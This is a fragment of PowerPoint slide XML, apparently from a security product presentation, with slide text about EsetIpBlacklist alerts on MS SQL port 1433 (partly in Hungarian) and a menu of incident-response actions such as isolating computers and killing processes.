          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="39" name="Graphic 38">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F31DD01-8E90-5412-8BD4-2655684C4E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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5763440" y="3501119"/>
                <a:ext cx="560981" cy="560981"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="40" name="Graphic 39">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FE17BE9-9E87-E778-0928-AF425BE750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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5763440" y="4716713"/>
                <a:ext cx="560981" cy="560981"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="41" name="Graphic 40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD2E153D-3E57-963B-C42E-3CEF7DBC40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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5782139" y="5919906"/>
                <a:ext cx="523582" cy="523582"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic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BACCD046-6E7E-AF1E-3E80-9D7EA4283C40}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5760212" y="4420881"/>
                <a:ext cx="5616625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42D63C70-A6E5-F906-039C-70E17E78FAD7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5760212" y="5547932"/>
                <a:ext cx="5616625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7CC3F411-BA69-2498-D8AD-00DE0E2D4519}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660289" y="7975601"/>
              <a:ext cx="5716548" cy="1168399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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>INCIDENT ACTIONS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Triangle 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A39FB2E-4D3C-E0B0-6D50-5C4D09B5D8DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="10594664" y="8465598"/>
              <a:ext cx="426260" cy="210887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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="sk-SK" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRPr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9B1387DA-7184-3CB9-C898-FBCB34778A8B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660289" y="5733171"/>
              <a:ext cx="5716546" cy="940360"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="1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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRPr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41183463-2887-11B3-6A22-B9EA59C7F6C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660289" y="4557301"/>
              <a:ext cx="5716546" cy="940360"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="10272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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp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9D7F3869-133D-D778-5DA1-0F8F37173766}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660289" y="2468488"/>
              <a:ext cx="5716546" cy="940360"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="10272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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRP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ED8048CD-0AC4-4555-CAA5-F9DB5983BA9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705518" y="10980865"/>
            <a:ext cx="5660130" cy="287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959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29B5D-CA53-A961-D44C-3BCC039649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5A5E162-0C5A-68DB-4581-E7247E2941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24691" y="4059955"/>
            <a:ext cx="4367591" cy="1820932"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0" smtClean="0"/>
              <a:t>MS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-SK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1643034-EEDD-F4CF-7905-BEB346283736}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-63432" y="10584774"/>
            <a:ext cx="18584214" cy="5660425"/>
            <a:chOff x="-63432" y="4641174"/>
            <a:chExt cx="18584214" cy="566042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1451391-1593-5A5B-55D5-9F6FFF8CC720}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-63432" y="4641174"/>
              <a:ext cx="18584214" cy="5660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C7F1A46-D846-FDA8-44D9-5A0340D01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037" b="-833"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="969716" y="5215950"/>
              <a:ext cx="16517919" cy="4071609"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:srgbClr val="00717F"/>
              </a:solidFill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57331B1-117B-937A-5E21-1F440329531F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9228675" y="2436886"/>
            <a:ext cx="4720931" cy="5067070"/>
            <a:chOff x="9228675" y="2933048"/>
            <a:chExt cx="4118889" cy="442088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114FF36-5EE7-5E5A-E47C-36119C310491}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9228675" y="2933048"/>
              <a:ext cx="4118889" cy="4420886"/>
              <a:chOff x="7931149" y="2626295"/>
              <a:chExt cx="4118889" cy="4420886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2BDD7C54-E189-419B-66A6-F6ED58F17B1A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="11339954" y="3278140"/>
                <a:ext cx="522194" cy="527315"/>
                <a:chOff x="3190875" y="974570"/>
                <a:chExt cx="249325" cy="251770"/>
              </a:xfrm>
            </p:grpSpPr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D64927CC-2E1F-EBD6-9EC6-0E8A2F7F34D1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p: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6255834F-376E-CC1E-32E6-A2E286E717C7}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/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806F02F3-A3BA-C5A9-411C-DF92E6461B1B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp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08345A70-076A-D956-7EF4-7FB578DD8888}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grp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F1E52F0-5C3B-6F7C-8B53-D87E781FBAD6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9243107" y="5949686"/>
                <a:ext cx="1528870" cy="10974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6537" b="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>SQL</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="15" name="Graphic 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1331F896-DF92-BC4A-5B1E-CFE2F7FA98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7931149" y="2626295"/>
                <a:ext cx="4118889" cy="4118889"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grp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D0489FD-DDFB-59E8-B2AE-9BF4A42F72D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10515933" y="4127841"/>
              <a:ext cx="1578270" cy="46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</p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411247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5FAD9-7620-E7D7-661A-E1B92453F3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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32345097-0A5F-0264-6E0A-C5EF4EFD0E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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1029396D-D023-3844-9576-CB159D3684E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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2395FCDA-98B4-48C8-C21B-D82CF931CF8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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CD7DF0E-756E-4EFE-02A1-58DDD823CE0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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" hidden="1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06DB0040-1E7B-CB6D-C7DA-447789F78E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78127" y="-67586"/>
            <a:ext cx="13425772" cy="10189508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323C649-9603-4D62-98CC-5C866A58E2D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8630343" y="-992671"/>
            <a:ext cx="3841620" cy="483282"/>
            <a:chOff x="11839730" y="3389691"/>
            <a:chExt cx="3841620" cy="483282"/>
          </a:xfrm>
        </p:grpSpPr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B570AED1-29B8-A954-C566-58BBF87DA46A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11839730" y="3390371"/>
              <a:ext cx="3663949" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4274CC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51" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85161DC3-EB6A-BD91-026C-EB6036C16D05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12438063" y="3389691"/>
              <a:ext cx="3243287" cy="483282"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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powershell.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0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(16656)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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7CACA457-2B03-996C-4A66-D50CE0EF7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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="11974098" y="3482196"/>
              <a:ext cx="347807" cy="260855"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="TextBox 124">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2183C76F-2E2D-9CCD-87C9-7A09724932B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882629" y="2268291"/>
            <a:ext cx="1175902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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EsetIpBlacklist.A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> riasztások a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1433</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> porta</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlserver.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>folyamat figyel ezen a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>porton</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SK" sz="2800" dirty="0"/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A927CF9F-FF88-A069-5ECE-09684EA923E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-63432" y="4641174"/>
            <a:ext cx="18584214" cy="5660425"/>
            <a:chOff x="-63432" y="4641174"/>
            <a:chExt cx="18584214" cy="5660425"/>
          </a:xfrm>
        </p:grpSpPr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5AC054D5-E1BC-2813-94EC-37B7F27EDC8C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-63432" y="4641174"/>
              <a:ext cx="18584214" cy="5660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id="{F11149A8-2BEC-52C7-CE6B-DB56B3C68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t="1037" b="-833"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="969716" y="5215950"/>
              <a:ext cx="16517919" cy="4071609"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:srgbClr val="00717F"/>
              </a:solidFill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912B5949-2FFD-E884-B372-C9F453437240}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="18967945" y="696324"/>
            <a:ext cx="3689914" cy="4302895"/>
            <a:chOff x="5295013" y="1531088"/>
            <a:chExt cx="6528391" cy="7612912"/>
          </a:xfrm>
          <a:effectLst>
            <a:outerShdw blurRad="281331" dist="707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F0D07328-4699-D1CF-68AC-0F0322DE26D8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5295013" y="1531088"/>
              <a:ext cx="6528391" cy="6444512"/>
              <a:chOff x="5295013" y="1531088"/>
              <a:chExt cx="6528391" cy="6444512"/>
            </a:xfrm>
          </p:grpSpPr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AC169E50-40B7-0781-AD8A-B02529E8E456}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5295013" y="1531088"/>
                <a:ext cx="6528391" cy="6444512"/>
                <a:chOff x="5295013" y="1531088"/>
                <a:chExt cx="6528391" cy="6444512"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="155" name="Triangle 154">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D4C5779-FCDF-058F-D773-7B9C62DAB95D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="10800000">
                  <a:off x="8322990" y="7676707"/>
                  <a:ext cx="491067" cy="298893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156" name="Rounded Rectangle 155">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9B1F8C4-D329-4D04-37AE-047B0AE2B03B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5295013" y="1531088"/>
                  <a:ext cx="6528391" cy="6145619"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst>
                    <a:gd name="adj" fmla="val 1096"/>
                  </a:avLst>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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</p:grpSp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E4924E8D-2EF2-15CE-6851-AA61D264D04F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5660289" y="1679946"/>
                <a:ext cx="3314628" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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Incident actions</a:t>
                </a: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C307653D-8C28-D6F2-D8BA-7918932497D8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="2583703"/>
                <a:ext cx="3625238" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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Isolate computers</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp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DE781C00-0F81-B8BA-44BD-6F4664426246}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="3458445"/>
                <a:ext cx="4604948" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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End computer isolation</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp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83888B4D-2FA1-FA54-D9EB-1487779B201B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="4674038"/>
                <a:ext cx="2789719" cy="707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Kill processes</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp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6AE186D4-DF25-4189-31B9-E6BC6FE836C8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="5858532"/>
                <a:ext cx="3416388" cy="707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Block executable</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp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E1946551-56CA-7187-1EEC-694FF3575C92}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="6751666"/>
                <a:ext cx="3938233" cy="707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Unblock executable</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="149" name="Graphic 148">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{835E2828-E1AE-F48E-7353-37C2C7BB43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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5782139" y="2645078"/>
                <a:ext cx="523582" cy="523582"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="150" name="Graphic 149">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFBBFBF0-1484-355C-94CD-CBD002A63B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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5763440" y="3501119"/>
                <a:ext cx="560981" cy="560981"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="151" name="Graphic 150">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B085BA9-41B3-09AC-9E89-7BD1AE68DB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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5763440" y="4716713"/>
                <a:ext cx="560981" cy="560981"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="152" name="Graphic 151">
                <a:extLst>
